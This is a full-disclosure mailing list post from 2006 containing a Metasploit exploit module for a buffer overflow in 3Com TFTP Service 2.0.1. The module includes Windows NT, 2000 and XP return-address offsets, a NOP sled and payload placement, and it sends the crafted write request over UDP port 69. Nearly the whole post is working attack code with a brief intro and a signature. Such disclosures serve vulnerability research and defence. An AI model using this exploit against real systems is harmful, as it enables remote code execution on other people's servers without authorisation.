Doesn't look like SEH is being overwritten so I'm having trouble getting
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K. 
Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

	include Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',
			'Description'    => %q{
				3Com TFTP Service version 2.0.1 suffers from a long type buffer
				overflow during a write TFTP request. Does not require write access
				to be enabled on the server.

				Attacker controls ESI.

				Liu Qixu of NCNIPC published this vulnerability.
			},
			'Author'         => 'grutz [at] jingojango.net',
			'Version'        => '$$',
			'References'     => 
				[ 
					['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
					['BID', '21301'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 440,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['Windows 2000 All SP English',   { 'Ret' => 0x750217ae } ], # call esi ws2help
					['Windows XP SP2 English',        { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
					['Windows NT SP5/6 English',      { 'Ret' => 0x776a117e } ], # call esi ws2help
				],

			'DefaultTarget'  => 0,
			'Privileged'     => false,
			'DisclosureDate' => 'Nov 27 2006'

			))

			register_options(
				[
						Opt::RPORT(69)
				], self)

	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		sploit = 
			"\x00\x02" + 
			Rex::Text.rand_text_english(1, payload_badchars) + 
			"\x00" +
			make_nops(473) +
			[target.ret].pack('V') +
			"\x00"
			
        sploit[9, payload.encoded.length] = payload.encoded

		udp_sock.put(sploit)
		
		disconnect_udp		
	end

end
end


-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
	"There's just no amusing way to say, 'I have a CISSP'."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/